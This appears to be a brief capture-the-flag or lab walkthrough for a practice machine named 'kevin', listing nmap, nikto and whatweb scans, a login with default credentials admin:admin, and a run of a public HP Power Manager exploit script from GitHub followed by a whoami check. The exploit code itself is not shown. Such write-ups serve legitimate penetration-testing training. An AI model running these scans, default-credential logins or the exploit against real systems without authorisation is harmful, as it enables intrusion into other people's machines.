nmap -A -p- -oA kevin 192.168.234.45 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA kevin 192.168.234.45

nmap -sU -O -p- -oA kevin-udp 192.168.234.45

nikto -h 192.168.234.45:80

Pasted image 20210920172051.png

Pasted image 20210920172402.png

whatweb http://192.168.234.45

Pasted image 20210920172323.png

http://192.168.234.45

credenciales admin:admin

Pasted image 20210920172622.png

https://github.com/Muhammd/HP-Power-Manager/blob/master/hpm_exploit.py

python2 hpm_exploit.py 192.168.234.45

Pasted image 20210920173404.png

whoami

Pasted image 20210920173334.png

boxes

copyright©2022 Cu3rv0x all rights reserved